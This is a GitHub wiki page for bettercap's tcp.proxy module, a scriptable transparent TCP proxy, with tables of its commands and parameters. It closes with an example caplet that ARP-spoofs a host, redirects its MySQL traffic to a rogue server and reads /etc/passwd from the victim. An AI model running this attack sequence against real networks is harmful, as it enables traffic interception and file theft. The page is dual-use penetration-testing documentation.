tcp.proxy - rhaidiz/bettercap GitHub Wiki
A TCP transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all TCP traffic to a given address and port will be redirected to it and it will automatically handle port redirections as needed.
The optional tcp.tunnel
parameter can be used to redirect the traffic from tcp.address
to tcp.tunnel.address
.
Commands
command | description |
---|---|
tcp.proxy on |
Start the TCP proxy. |
tcp.proxy off |
Stop the TCP proxy. |
Parameters
parameter | default | description |
---|---|---|
tcp.port |
443 |
TCP port to redirect when the proxy is activated. |
tcp.address |
Mandatory remote address of the TCP proxy. | |
tcp.proxy.port |
8443 |
Port to bind the TCP proxy to. |
tcp.proxy.address |
<interface address> |
Address to bind the TCP proxy to. |
tcp.proxy.script |
Path of a proxy module script. | |
tcp.tunnel.address |
Address to redirect the TCP tunnel to (optional). | |
tcp.tunnel.port |
Port to redirect the TCP tunnel to (optional) |
Examples
The rogue-mysql-server.cap executes an ARP spoofing attack against a single host and redirect the MySQL traffic to a rogue server.
# set the target for arp spoofing
set arp.spoof.targets 192.168.1.236
# bind rogue mysql server to localhost and
# set the file we want to read
set mysql.server.address 127.0.0.1
set mysql.server.port 3306
set mysql.server.infile /etc/passwd
mysql.server on
# set the ip from the mysql server we want to impersonate
set tcp.address 93.184.216.34
set tcp.port 3306
# set the ip from the rogue mysql server
set tcp.tunnel.address 127.0.0.1
set tcp.tunnel.port 3306
# go ^_^
tcp.proxy on
arp.spoof on